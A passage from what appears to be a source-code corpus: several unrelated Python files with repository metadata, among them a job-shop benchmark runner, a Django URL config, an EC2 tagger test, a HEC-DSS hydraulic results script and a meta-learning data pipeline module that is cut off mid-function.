# As one might imagine, recovering a good approximation of the state requires more samples as the order of the polynomial increases.
# ### Estimating $x$
#
# Given enough samples $\hat{x}$ should converge to $x$. The exact number of measurements required depends on the complexity of mapping the state space to the measurement space, $H$ and how noisy the measurements are, determined by $v$.
#
# Recall from lecture:
#
# $
# \hat{x} = (H^T H)^{-1} H^T \tilde{y}
# $
#
# $\hat{x}$ should be similar to $x$.
# In[8]:
x_hat = LA.pinv(H.T @ H) @ H.T @ y_obs
# In[9]:
print(x_hat)
print(x)
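# In[ ]:
# As an optional cross-check (not part of the original exercise), numpy's polyfit
# solves the same least-squares problem; its coefficients are ordered from the
# highest power to the lowest, matching H, so the result should be close to x_hat.
print(np.polyfit(t, y_obs, n - 1))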
# In[ ]:
|
[
"arush@ilovebrands.net"
] |
arush@ilovebrands.net
|
623d7b812b2e43e3541b088ba3b63a76c0ac5857
|
20569ea832802e5dadde2cbc4c144ff02d85d355
|
/utils/BenchmarkRunner.py
|
fa230c9af28272b4a1fb6624842c5d4cd34f65b6
|
[
"MIT"
] |
permissive
|
bwhub/CONVJSSP
|
6017359f7bf21a1e257df121baf3f83fc22a80ba
|
dd9084dc370e6113df749b247ee05670e46fca3f
|
refs/heads/master
| 2023-02-01T15:18:43.057072
| 2020-12-14T17:10:26
| 2020-12-14T17:10:26
| 299,891,152
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,125
|
py
|
import subprocess
from tqdm import tqdm
import itertools as it
import os
import multiprocessing as mp
class BenchmarkRunner:
def __init__(self, log_dir, exec_path="../src/job-shop-experiment/job-shop", repeat_time=1, warmup_seconds=0):
self.exec_path = exec_path + " "
self.log_dir = log_dir
self.repeat_time = repeat_time
self.available_parameter_dict, self.available_instance_list = self._get_avaialbe_benchmark_options()
print("# Length of the available instance list is {}".format(len(self.available_instance_list)))
self.test_parameter_dict = {}
self.test_instance_list = []
self.warmup_seconds = warmup_seconds
# add testing parameters
def _run_single_command(self, cmd_str):
# function to execute a single command
p = subprocess.Popen(cmd_str.split(), stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output, err = p.communicate()
return output.decode('utf-8')
def run_test(self, log_dir=None):
if log_dir==None:
log_dir = self.log_dir
all_parameter_names = sorted(self.test_parameter_dict)
# all_parameter_names = self.test_parameter_dict
parameter_combination_list = list(it.product(*((self._add_key_2_every_val(para_name, self.test_parameter_dict[para_name]) for para_name in all_parameter_names))))
testing_list = [ (list(para)+[instance]) for para in parameter_combination_list for instance in self.test_instance_list]
# print(testing_list)
result_list = []
if(self.warmup_seconds > 0):
print("Staring warmup for {} seconds".format(self.warmup_seconds))
self._run_single_command('stress --cpu 1 --timeout ' + str(self.warmup_seconds))
print("Finished warmup. Now starting the benchmark.")
for i in range(self.repeat_time):
for test in tqdm(testing_list):
cmd = self.exec_path + " ".join(test)
log_file_name = self.log_dir + " ".join(test).replace(" ", "_").replace("-", "")+"_run_"+str(i)+".log"
exists = os.path.isfile(log_file_name)
if not exists:
# run a single benchmark
result = self._run_single_command(cmd)
# write the result to a log file
with open(log_file_name, "w") as log_file:
log_file.write(cmd)
log_file.write('\n')
log_file.write(result)
result_list.append(result)
return result_list
def run_test_parallel(self, log_dir=None, process_count=mp.cpu_count()):
if process_count > mp.cpu_count():
            print('The number of processes should not exceed cpu_count; using cpu_count instead.')
process_count = mp.cpu_count()
if log_dir==None:
log_dir = self.log_dir
all_parameter_names = sorted(self.test_parameter_dict)
# all_parameter_names = self.test_parameter_dict
parameter_combination_list = list(it.product(*((self._add_key_2_every_val(para_name, self.test_parameter_dict[para_name]) for para_name in all_parameter_names))))
testing_list = [ (list(para)+[instance]) for para in parameter_combination_list for instance in self.test_instance_list]
# print(testing_list)
result_list = []
if(self.warmup_seconds > 0):
print("Staring warmup for {} seconds".format(self.warmup_seconds))
self._run_single_command('stress --cpu 1 --timeout ' + str(self.warmup_seconds))
print("Finished warmup. Now starting the benchmark.")
print("The first element in testing list is {}".format(testing_list[0]))
with mp.Pool(process_count) as pool:
result_list = pool.starmap_async(self._run_single_JSSP_instance, [(test, 0) for test in testing_list]).get()
# for i in range(self.repeat_time):
# for test in tqdm(testing_list):
# pool.apply_async(self._run_single_JSSP_instance, args=(test, i))
return result_list
def _run_single_JSSP_instance(self, test, repeat_time):
cmd = self.exec_path + " ".join(test)
log_file_name = self.log_dir + " ".join(test).replace(" ", "_").replace("-", "")+"_run_"+str(repeat_time)+".log"
exists = os.path.isfile(log_file_name)
if not exists:
# run a single benchmark
result = self._run_single_command(cmd)
# write the result to a log file
with open(log_file_name, "w") as log_file:
log_file.write(cmd)
log_file.write('\n')
log_file.write(result)
return result
# def add_testing_instances(self, instance_list):
# print("Start add_testing_instances")
# for instance in instance_list:
# if instance.split()[-1] in self.available_instance_list:
# self.test_instance_list.append(instance)
def add_testing_instances(self, instance_list):
print("Start add_testing_instances")
for instance in instance_list:
self.test_instance_list.append(instance)
def _add_key_2_every_val(self, key, val_list):
return [(key + " " + v) for v in val_list]
def add_parameter_options(self, para_dict):
# add values for benchmarks for one parameter
assert len(para_dict) == 1, 'Please add one parameter at a time'
key = list(para_dict.keys())[0]
        assert key in self.available_parameter_dict, 'Parameter {} is not available'.format(key)
val = para_dict[key]
self.test_parameter_dict[key] = val
def get_current_test_instances(self):
return self.test_instance_list
def get_current_test_parameters(self):
return self.test_parameter_dict
def get_available_instance_list(self):
return self.available_instance_list
    def _get_available_benchmark_options(self, exec_path=None, help_cmd=' --help'):
# get available parameter options from the program
if exec_path==None:
exec_path = self.exec_path
help_str = self._run_single_command(exec_path + help_cmd)
help_list = help_str.replace('\t', ' ').replace('\n', ' ').split(' ')
# get parameter options
parameter_list = [x for x in help_list if x.startswith('-') and len(x) >1][3:]
parameter_dict = {}
for option in parameter_list:
parameter_dict[option] = []
# get jssp instance options
instance_list = "".join(help_list[help_list.index('instances:')+1:]).split(',')[:-1]
return parameter_dict, instance_list
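# A minimal usage sketch (hypothetical: the log directory and the "-t"/"-i" arguments below
# are assumptions -- the real options are parsed from the solver's --help output):
if __name__ == "__main__":
    runner = BenchmarkRunner(log_dir="./logs/", repeat_time=1)
    runner.add_parameter_options({"-t": ["10", "60"]})    # assumed time-limit flag
    runner.add_testing_instances(["-i ft06", "-i la01"])  # assumed instance arguments
    for output in runner.run_test():
        print(output)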
|
[
"blakewang@live.com"
] |
blakewang@live.com
|
347412fdfa9287d03bb131ce4771ae5ddacded33
|
4d5721457ae7856c11c869c5966a36416e1144c3
|
/djagno_pg_trgm/urls.py
|
1a25a241b46a0c0c72b051c4439ebc836c906d89
|
[] |
no_license
|
Zlira/django_pg_trgm
|
dd65df6caf372f2777db73d85c815eab661abd9d
|
59ad1b95a8a08783af856b200b53a793d1d8b403
|
refs/heads/master
| 2016-09-13T12:54:17.202890
| 2016-05-02T11:29:44
| 2016-05-02T11:29:44
| 57,662,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 283
|
py
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'djagno_pg_trgm.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
)
|
[
"olesia.hr@gmail.com"
] |
olesia.hr@gmail.com
|
9fa2c72d698228f49d9a9ff9bacf0479f901071d
|
a79faf54ba4e6b8a1223d17b9b242fc7c52e7342
|
/test/tagger_test/test_ec2_tagger.py
|
ce170114b362d92fbd80e140bc549d14d19b538e
|
[
"Apache-2.0"
] |
permissive
|
sahajsoft/LUAU
|
773193cb549752a202a03d388e463ad11181af2e
|
1578fb971fb745d8ca4c42ff9c1ee0a1c7480194
|
refs/heads/master
| 2021-06-25T23:49:03.730066
| 2020-10-16T13:01:28
| 2020-10-16T13:01:28
| 153,218,839
| 1
| 1
|
Apache-2.0
| 2019-02-06T07:44:53
| 2018-10-16T03:45:03
|
Python
|
UTF-8
|
Python
| false
| false
| 709
|
py
|
import unittest
import json
import boto3
import os
from mock import MagicMock
from moto import mock_autoscaling, mock_ec2
from tagger.ec2_tagger import EC2Tagger
class TestEC2Tagger(unittest.TestCase):
@mock_ec2
def setUp(self):
json_data = open('./test/example_events/run_instances.json').read()
self.event = json.loads(json_data)
self.region = 'us-west-2'
os.environ['AWS_REGION'] = 'us-west-2'
@mock_ec2
def test_start(self):
self.tagger = EC2Tagger(self.event, None)
response = self.tagger.start()
response_metadata = response['ResponseMetadata']
self.assertEqual(response_metadata['HTTPStatusCode'], 200)
|
[
"keithwhitley@Keiths-MacBook-Pro.local"
] |
keithwhitley@Keiths-MacBook-Pro.local
|
87418f41882ec35f3c52caae603025eb269fc11b
|
31473c88fbfb0dbd436468b7535787cdc91ce472
|
/ItemFastAPI/env/Lib/site-packages/poetry/core/__init__.py
|
a06869c8b84d72266573e3eaa9e694e31582d97a
|
[] |
no_license
|
WaleedAlromaema/ItemFastAPI
|
9fef19e4f85193f6f17d18c0c393148f4fe510c6
|
9aa4779dc7d45c38bdd738d0d311d35f9042cd4c
|
refs/heads/master
| 2023-07-10T14:19:28.077497
| 2021-08-01T14:08:24
| 2021-08-01T14:08:24
| 391,641,951
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
import sys
try:
from pathlib import Path
except ImportError:
# noinspection PyUnresolvedReferences
from pathlib2 import Path
__version__ = "1.0.3"
__vendor_site__ = (Path(__file__).parent / "_vendor").as_posix()
if __vendor_site__ not in sys.path:
sys.path.insert(0, __vendor_site__)
|
[
"WalRoma@DESKTOP-TJNDUI1"
] |
WalRoma@DESKTOP-TJNDUI1
|
c2dfa472424134a661b3b929c19173f3627a69ca
|
50edc4d858276ae080a40561f68d64e2a9c8bb1d
|
/ExampleHydraulicComparison.py
|
0dcbeff5edf4853c8d47dac7b82b9c34d43c643f
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
iordach1/ICE-Coding
|
eef59eb043565c10208e197ce4109ba8ea86b11e
|
fb72df738e812f228fb4947f8fd3990754850c71
|
refs/heads/master
| 2020-03-28T03:54:50.491205
| 2018-08-16T17:40:40
| 2018-08-16T17:40:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,174
|
py
|
# Example Jython script demonstrating how DSS data can be accessed
# within execution of HEC-DSSVue and obtain hydraulic results from
# a HEC-RAS DSS file.
import sys
def GetMaxValueIndex(hydrograph):
# Gets the index of the entry in supplied
# array with the largest value
idx = 0
max = float(-sys.maxint)
for i in range (0, len(hydrograph.values)):
if (hydrograph.values[i] > max):
max = hydrograph.values[i]
idx = i
return idx
from hec.heclib.dss import HecDss
# obtain configuration details for HEC applications for
# python and jython scripts
import src.hecConfig
reload(src.hecConfig)
config = src.hecConfig.HecConfig()
dssFilePath=config.getRasProjectPath() + "/" + config.rasProjectName + ".dss"
dss = HecDss.open(dssFilePath)
hydraulicResults = {}
import pickle
dtf = open(config.getDataTransferFilePath(),'r+')
ditchNames = pickle.load(dtf)
dtf.close()
for ditchName in ditchNames:
# get some flow data from the DSS file - obtain peak values
dataPath = "/" + ditchName + "/FLOW/01DEC2006/1HOUR/" + config.rasPlanName + "/"
dataHydrograph = dss.get(dataPath.upper(), True); # true ensures entire time series is loaded
maxValueIdx = GetMaxValueIndex(dataHydrograph)
peakFlowValue = dataHydrograph.values[maxValueIdx]
peakFlowTime = dataHydrograph.times[maxValueIdx]
#print dataHydrograph.values
#print maxValueIdx
dataPath = "/" + ditchName + "/STAGE/01DEC2006/1HOUR/" + config.rasPlanName + "/"
dataHydrograph = dss.get(dataPath.upper(), True); # true ensures entire time series is loaded
peakStageValue = max(dataHydrograph.values)
hydraulicValues = {"peakFlowRate": peakFlowValue, "peakFlowTiming": peakFlowTime, "peakStage": peakStageValue}
hydraulicResults[ditchName] = hydraulicValues;
# Write results to an intermediate file that can be read by the calling
# Python script, as communication between Jython (called from HEC software) and
# Python is somewhat limited
#print hydraulicResults
dtf = open(config.getDataTransferFilePath(),'w')
dtf.write(str(hydraulicResults))
dtf.close()
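# A minimal sketch (assumption: this belongs in the calling CPython script, not in this
# Jython script) of reading the transfer file back, since the dictionary is written via str():
#
#   import ast
#   with open(config.getDataTransferFilePath()) as dtf:
#       hydraulicResults = ast.literal_eval(dtf.read())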
|
[
"noreply@github.com"
] |
iordach1.noreply@github.com
|
44ef8859d033e58a0a9a56f33e20576e31bb6668
|
85310673ac3e45956dfa904fe7fecf5d6c57bfee
|
/meta_dataset/data/pipeline.py
|
df807be9e188307ec47e3ac59bc901316c82b46e
|
[
"Apache-2.0"
] |
permissive
|
ebadrian/meta_dataset
|
c994f15a4cda2bf8e5b51539b174184a3269e5eb
|
bd40ec4486de165fa6f4ca9fe839e1f685a0ee27
|
refs/heads/main
| 2023-01-23T18:59:36.501160
| 2020-12-04T23:49:08
| 2020-12-04T23:49:08
| 318,241,469
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,065
|
py
|
# coding=utf-8
# Copyright 2020 The Meta-Dataset Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""This module assembles full input data pipelines.
The whole pipeline incorporates (potentially) multiple Readers, the logic to
select between them, and the common logic to extract support / query sets if
needed, decode the example strings, and resize the images.
"""
# TODO(lamblinp): Organize the make_*_pipeline functions into classes, and
# make them output Batch or EpisodeDataset objects directly.
# TODO(lamblinp): Update variable names to be more consistent
# - target, class_idx, label
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from absl import logging
import gin.tf
from meta_dataset import data
from meta_dataset.data import decoder
from meta_dataset.data import learning_spec
from meta_dataset.data import reader
from meta_dataset.data import sampling
from six.moves import zip
import tensorflow.compat.v1 as tf
def filter_dummy_examples(example_strings, class_ids):
"""Returns tensors with only actual examples, filtering out the dummy ones.
Actual examples are the first ones in the tensors, and followed by dummy ones,
indicated by negative class IDs.
Args:
example_strings: 1-D Tensor of dtype str, Example protocol buffers.
class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
dataset, except for negative ones, that indicate dummy examples).
"""
num_actual = tf.reduce_sum(tf.cast(class_ids >= 0, tf.int32))
actual_example_strings = example_strings[:num_actual]
actual_class_ids = class_ids[:num_actual]
return (actual_example_strings, actual_class_ids)
def log_data_augmentation(data_augmentation, name):
"""Logs the given data augmentation parameters for diagnostic purposes."""
if not data_augmentation:
logging.info('No data augmentation provided for %s', name)
else:
logging.info('%s augmentations:', name)
logging.info('enable_jitter: %s', data_augmentation.enable_jitter)
logging.info('jitter_amount: %d', data_augmentation.jitter_amount)
logging.info('enable_gaussian_noise: %s',
data_augmentation.enable_gaussian_noise)
logging.info('gaussian_noise_std: %s', data_augmentation.gaussian_noise_std)
def flush_and_chunk_episode(example_strings, class_ids, chunk_sizes):
"""Removes flushed examples from an episode and chunks it.
This function:
1) splits the batch of examples into a "flush" chunk and some number of
additional chunks (as determined by `chunk_sizes`),
2) throws away the "flush" chunk, and
3) removes the padded dummy examples from the additional chunks.
For example, in the context of few-shot learning, where episodes are composed
of a support set and a query set, `chunk_size = (150, 100, 50)` would be
interpreted as describing a "flush" chunk of size 150, a "support" chunk of
size 100, and a "query" chunk of size 50.
Args:
example_strings: 1-D Tensor of dtype str, tf.train.Example protocol buffers.
class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
dataset).
chunk_sizes: tuple of ints representing the sizes of the flush and
additional chunks.
Returns:
A tuple of episode chunks of the form `((chunk_0_example_strings,
chunk_0_class_ids), (chunk_1_example_strings, chunk_1_class_ids), ...)`.
"""
example_strings_chunks = tf.split(
example_strings, num_or_size_splits=chunk_sizes)[1:]
class_ids_chunks = tf.split(class_ids, num_or_size_splits=chunk_sizes)[1:]
return tuple(
filter_dummy_examples(strings, ids)
for strings, ids in zip(example_strings_chunks, class_ids_chunks))
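# Worked illustration (not part of the original module): with chunk_sizes=(3, 2, 2) and
# class_ids=[4, 4, 7, 5, 5, 9, -1], the first three elements form the flush chunk and are
# discarded, the support chunk keeps class IDs [5, 5], and the query chunk keeps [9] after
# `filter_dummy_examples` drops the padded dummy example with class ID -1.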
@gin.configurable(whitelist=['support_decoder', 'query_decoder'])
def process_dumped_episode(support_strings, query_strings, image_size,
support_decoder, query_decoder):
"""Processes a dumped episode.
This function is almost like `process_episode()` function, except:
- It doesn't need to call flush_and_chunk_episode().
- And the labels are read from the tf.Example directly. We assume that
labels are already mapped in to [0, n_ways - 1].
Args:
support_strings: 1-D Tensor of dtype str, Example protocol buffers of
support set.
query_strings: 1-D Tensor of dtype str, Example protocol buffers of query
set.
image_size: int, desired image size used during decoding.
support_decoder: ImageDecoder, used to decode support set images.
query_decoder: ImageDecoder, used to decode query set images.
Returns:
support_images, support_labels, support_labels, query_images,
query_labels, query_labels: Tensors, batches of images, labels, and
labels, for the support and query sets (respectively). We return labels
twice since dumped datasets doesn't have (absolute) class IDs anymore.
"""
if isinstance(support_decoder, decoder.ImageDecoder):
log_data_augmentation(support_decoder.data_augmentation, 'support')
support_decoder.image_size = image_size
else:
raise TypeError('support_decoder type: %s is not ImageDecoder' %
type(support_decoder))
if isinstance(query_decoder, decoder.ImageDecoder):
log_data_augmentation(query_decoder.data_augmentation, 'query')
query_decoder.image_size = image_size
else:
raise TypeError('query_decoder type: %s is not ImageDecoder' %
type(query_decoder))
support_decoder.image_size = image_size
query_decoder.image_size = image_size
support_images, support_labels = tf.map_fn(
support_decoder.decode_with_label,
support_strings,
dtype=(support_decoder.out_type, tf.int32),
back_prop=False)
  query_images, query_labels = tf.map_fn(
      query_decoder.decode_with_label,
      query_strings,
      dtype=(query_decoder.out_type, tf.int32),
      back_prop=False)
return (support_images, support_labels, support_labels, query_images,
query_labels, query_labels)
@gin.configurable(whitelist=['support_decoder', 'query_decoder'])
def process_episode(example_strings, class_ids, chunk_sizes, image_size,
support_decoder, query_decoder):
"""Processes an episode.
This function:
1) splits the batch of examples into "flush", "support", and "query" chunks,
2) throws away the "flush" chunk,
3) removes the padded dummy examples from the "support" and "query" chunks,
4) extracts and processes images out of the example strings, and
5) builds support and query targets (numbers from 0 to K-1 where K is the
number of classes in the episode) from the class IDs.
Args:
example_strings: 1-D Tensor of dtype str, tf.train.Example protocol buffers.
class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
dataset).
chunk_sizes: Tuple of ints representing the sizes the flush and additional
chunks.
image_size: int, desired image size used during decoding.
support_decoder: Decoder, used to decode support set images.
query_decoder: Decoder, used to decode query set images.
Returns:
support_images, support_labels, support_class_ids, query_images,
query_labels, query_class_ids: Tensors, batches of images, labels, and
(absolute) class IDs, for the support and query sets (respectively).
"""
# TODO(goroshin): Replace with `support_decoder.log_summary(name='support')`.
# TODO(goroshin): Eventually remove setting the image size here and pass it
# to the ImageDecoder constructor instead.
if isinstance(support_decoder, decoder.ImageDecoder):
log_data_augmentation(support_decoder.data_augmentation, 'support')
support_decoder.image_size = image_size
if isinstance(query_decoder, decoder.ImageDecoder):
log_data_augmentation(query_decoder.data_augmentation, 'query')
query_decoder.image_size = image_size
(support_strings, support_class_ids), (query_strings, query_class_ids) = \
flush_and_chunk_episode(example_strings, class_ids, chunk_sizes)
support_images = tf.map_fn(
support_decoder,
support_strings,
dtype=support_decoder.out_type,
back_prop=False)
query_images = tf.map_fn(
query_decoder,
query_strings,
dtype=query_decoder.out_type,
back_prop=False)
# Convert class IDs into labels in [0, num_ways).
_, support_labels = tf.unique(support_class_ids)
_, query_labels = tf.unique(query_class_ids)
return (support_images, support_labels, support_class_ids, query_images,
query_labels, query_class_ids)
@gin.configurable(whitelist=['batch_decoder'])
def process_batch(example_strings, class_ids, image_size, batch_decoder):
"""Processes a batch.
This function:
1) extracts and processes images out of the example strings.
2) builds targets from the class ID and offset.
Args:
example_strings: 1-D Tensor of dtype str, Example protocol buffers.
class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
dataset).
image_size: int, desired image size used during decoding.
batch_decoder: Decoder class instance for the batch.
Returns:
images, labels: Tensors, a batch of image and labels.
"""
# TODO(goroshin): Replace with `batch_decoder.log_summary(name='support')`.
if isinstance(batch_decoder, decoder.ImageDecoder):
log_data_augmentation(batch_decoder.data_augmentation, 'batch')
batch_decoder.image_size = image_size
images = tf.map_fn(
batch_decoder,
example_strings,
dtype=batch_decoder.out_type,
back_prop=False)
labels = class_ids
return (images, labels)
def make_one_source_episode_pipeline(dataset_spec,
use_dag_ontology,
use_bilevel_ontology,
split,
episode_descr_config,
pool=None,
shuffle_buffer_size=None,
read_buffer_size_bytes=None,
num_prefetch=0,
image_size=None,
num_to_take=None):
"""Returns a pipeline emitting data from one single source as Episodes.
Args:
dataset_spec: A DatasetSpecification object defining what to read from.
use_dag_ontology: Whether to use source's ontology in the form of a DAG to
sample episodes classes.
use_bilevel_ontology: Whether to use source's bilevel ontology (consisting
of superclasses and subclasses) to sample episode classes.
split: A learning_spec.Split object identifying the source (meta-)split.
episode_descr_config: An instance of EpisodeDescriptionConfig containing
parameters relating to sampling shots and ways for episodes.
pool: String (optional), for example-split datasets, which example split to
use ('train', 'valid', or 'test'), used at meta-test time only.
shuffle_buffer_size: int or None, shuffle buffer size for each Dataset.
read_buffer_size_bytes: int or None, buffer size for each TFRecordDataset.
num_prefetch: int, the number of examples to prefetch for each class of each
dataset. Prefetching occurs just after the class-specific Dataset object
is constructed. If < 1, no prefetching occurs.
image_size: int, desired image size used during decoding.
num_to_take: Optional, an int specifying a number of elements to pick from
each class' tfrecord. If specified, the available images of each class
will be restricted to that int. By default no restriction is applied and
all data is used.
Returns:
A Dataset instance that outputs tuples of fully-assembled and decoded
episodes zipped with the ID of their data source of origin.
"""
use_all_classes = False
if pool is not None:
if not data.POOL_SUPPORTED:
raise NotImplementedError('Example-level splits or pools not supported.')
if num_to_take is None:
num_to_take = -1
episode_reader = reader.EpisodeReader(dataset_spec, split,
shuffle_buffer_size,
read_buffer_size_bytes, num_prefetch,
num_to_take)
sampler = sampling.EpisodeDescriptionSampler(
episode_reader.dataset_spec,
split,
episode_descr_config,
pool=pool,
use_dag_hierarchy=use_dag_ontology,
use_bilevel_hierarchy=use_bilevel_ontology,
use_all_classes=use_all_classes)
dataset = episode_reader.create_dataset_input_pipeline(sampler, pool=pool)
# Episodes coming out of `dataset` contain flushed examples and are internally
# padded with dummy examples. `process_episode` discards flushed examples,
# splits the episode into support and query sets, removes the dummy examples
# and decodes the example strings.
chunk_sizes = sampler.compute_chunk_sizes()
map_fn = functools.partial(
process_episode, chunk_sizes=chunk_sizes, image_size=image_size)
dataset = dataset.map(map_fn)
# There is only one data source, so we know that all episodes belong to it,
# but for interface consistency, zip with a dataset identifying the source.
source_id_dataset = tf.data.Dataset.from_tensors(0).repeat()
dataset = tf.data.Dataset.zip((dataset, source_id_dataset))
# Overlap episode processing and training.
dataset = dataset.prefetch(1)
return dataset
def make_multisource_episode_pipeline(dataset_spec_list,
use_dag_ontology_list,
use_bilevel_ontology_list,
split,
episode_descr_config,
pool=None,
shuffle_buffer_size=None,
read_buffer_size_bytes=None,
num_prefetch=0,
image_size=None,
num_to_take=None):
"""Returns a pipeline emitting data from multiple sources as Episodes.
Each episode only contains data from one single source. For each episode, its
source is sampled uniformly across all sources.
Args:
dataset_spec_list: A list of DatasetSpecification, one for each source.
use_dag_ontology_list: A list of Booleans, one for each source: whether to
use that source's DAG-structured ontology to sample episode classes.
use_bilevel_ontology_list: A list of Booleans, one for each source: whether
to use that source's bi-level ontology to sample episode classes.
split: A learning_spec.Split object identifying the sources split. It is the
same for all datasets.
episode_descr_config: An instance of EpisodeDescriptionConfig containing
parameters relating to sampling shots and ways for episodes.
pool: String (optional), for example-split datasets, which example split to
use ('train', 'valid', or 'test'), used at meta-test time only.
shuffle_buffer_size: int or None, shuffle buffer size for each Dataset.
read_buffer_size_bytes: int or None, buffer size for each TFRecordDataset.
num_prefetch: int, the number of examples to prefetch for each class of each
dataset. Prefetching occurs just after the class-specific Dataset object
is constructed. If < 1, no prefetching occurs.
image_size: int, desired image size used during decoding.
num_to_take: Optional, a list specifying for each dataset the number of
examples per class to restrict to (for this given split). If provided, its
length must be the same as len(dataset_spec). If None, no restrictions are
applied to any dataset and all data per class is used.
Returns:
A Dataset instance that outputs tuples of fully-assembled and decoded
episodes zipped with the ID of their data source of origin.
"""
if pool is not None:
if not data.POOL_SUPPORTED:
raise NotImplementedError('Example-level splits or pools not supported.')
if num_to_take is not None and len(num_to_take) != len(dataset_spec_list):
raise ValueError('num_to_take does not have the same length as '
'dataset_spec_list.')
if num_to_take is None:
num_to_take = [-1] * len(dataset_spec_list)
sources = []
for source_id, (dataset_spec, use_dag_ontology, use_bilevel_ontology,
num_to_take_for_dataset) in enumerate(
zip(dataset_spec_list, use_dag_ontology_list,
use_bilevel_ontology_list, num_to_take)):
episode_reader = reader.EpisodeReader(dataset_spec, split,
shuffle_buffer_size,
read_buffer_size_bytes, num_prefetch,
num_to_take_for_dataset)
sampler = sampling.EpisodeDescriptionSampler(
episode_reader.dataset_spec,
split,
episode_descr_config,
pool=pool,
use_dag_hierarchy=use_dag_ontology,
use_bilevel_hierarchy=use_bilevel_ontology)
dataset = episode_reader.create_dataset_input_pipeline(sampler, pool=pool)
# Create a dataset to zip with the above for identifying the source.
source_id_dataset = tf.data.Dataset.from_tensors(source_id).repeat()
sources.append(tf.data.Dataset.zip((dataset, source_id_dataset)))
# Sample uniformly among sources.
dataset = tf.data.experimental.sample_from_datasets(sources)
# Episodes coming out of `dataset` contain flushed examples and are internally
# padded with dummy examples. `process_episode` discards flushed examples,
# splits the episode into support and query sets, removes the dummy examples
# and decodes the example strings.
chunk_sizes = sampler.compute_chunk_sizes()
def map_fn(episode, source_id):
return process_episode(
*episode, chunk_sizes=chunk_sizes, image_size=image_size), source_id
dataset = dataset.map(map_fn)
# Overlap episode processing and training.
dataset = dataset.prefetch(1)
return dataset
def make_one_source_batch_pipeline(dataset_spec,
split,
batch_size,
pool=None,
shuffle_buffer_size=None,
read_buffer_size_bytes=None,
num_prefetch=0,
image_size=None,
num_to_take=None):
"""Returns a pipeline emitting data from one single source as Batches.
Args:
dataset_spec: A DatasetSpecification object defining what to read from.
split: A learning_spec.Split object identifying the source split.
batch_size: An int representing the max number of examples in each batch.
pool: String (optional), for example-split datasets, which example split to
use ('valid', or 'test'), used at meta-test time only.
shuffle_buffer_size: int or None, number of examples in the buffer used for
shuffling the examples from different classes, while they are mixed
together. There is only one shuffling operation, not one per class.
read_buffer_size_bytes: int or None, buffer size for each TFRecordDataset.
num_prefetch: int, the number of examples to prefetch for each class of each
dataset. Prefetching occurs just after the class-specific Dataset object
is constructed. If < 1, no prefetching occurs.
image_size: int, desired image size used during decoding.
num_to_take: Optional, an int specifying a number of elements to pick from
each class' tfrecord. If specified, the available images of each class
will be restricted to that int. By default no restriction is applied and
all data is used.
Returns:
A Dataset instance that outputs decoded batches from all classes in the
split.
"""
if num_to_take is None:
num_to_take = -1
batch_reader = reader.BatchReader(dataset_spec, split, shuffle_buffer_size,
read_buffer_size_bytes, num_prefetch,
num_to_take)
dataset = batch_reader.create_dataset_input_pipeline(
batch_size=batch_size, pool=pool)
map_fn = functools.partial(process_batch, image_size=image_size)
dataset = dataset.map(map_fn)
# There is only one data source, so we know that all batches belong to it,
# but for interface consistency, zip with a dataset identifying the source.
source_id_dataset = tf.data.Dataset.from_tensors(0).repeat()
dataset = tf.data.Dataset.zip((dataset, source_id_dataset))
# Overlap episode processing and training.
dataset = dataset.prefetch(1)
return dataset
# TODO(lamblinp): Update this option's name
@gin.configurable('BatchSplitReaderGetReader', whitelist=['add_dataset_offset'])
def make_multisource_batch_pipeline(dataset_spec_list,
split,
batch_size,
add_dataset_offset,
pool=None,
shuffle_buffer_size=None,
read_buffer_size_bytes=None,
num_prefetch=0,
image_size=None,
num_to_take=None):
"""Returns a pipeline emitting data from multiple source as Batches.
Args:
dataset_spec_list: A list of DatasetSpecification, one for each source.
split: A learning_spec.Split object identifying the source split.
batch_size: An int representing the max number of examples in each batch.
add_dataset_offset: A Boolean, whether to add an offset to each dataset's
targets, so that each target is unique across all datasets.
pool: String (optional), for example-split datasets, which example split to
use ('valid', or 'test'), used at meta-test time only.
shuffle_buffer_size: int or None, number of examples in the buffer used for
shuffling the examples from different classes, while they are mixed
together. There is only one shuffling operation, not one per class.
read_buffer_size_bytes: int or None, buffer size for each TFRecordDataset.
num_prefetch: int, the number of examples to prefetch for each class of each
dataset. Prefetching occurs just after the class-specific Dataset object
is constructed. If < 1, no prefetching occurs.
image_size: int, desired image size used during decoding.
num_to_take: Optional, a list specifying for each dataset the number of
examples per class to restrict to (for this given split). If provided, its
length must be the same as len(dataset_spec). If None, no restrictions are
applied to any dataset and all data per class is used.
Returns:
A Dataset instance that outputs decoded batches from all classes in the
split.
"""
if num_to_take is not None and len(num_to_take) != len(dataset_spec_list):
raise ValueError('num_to_take does not have the same length as '
'dataset_spec_list.')
if num_to_take is None:
num_to_take = [-1] * len(dataset_spec_list)
sources = []
offset = 0
for source_id, (dataset_spec, num_to_take_for_dataset) in enumerate(
zip(dataset_spec_list, num_to_take)):
batch_reader = reader.BatchReader(dataset_spec, split, shuffle_buffer_size,
read_buffer_size_bytes, num_prefetch,
num_to_take_for_dataset)
dataset = batch_reader.create_dataset_input_pipeline(
batch_size=batch_size, pool=pool, offset=offset)
# Create a dataset to zip with the above for identifying the source.
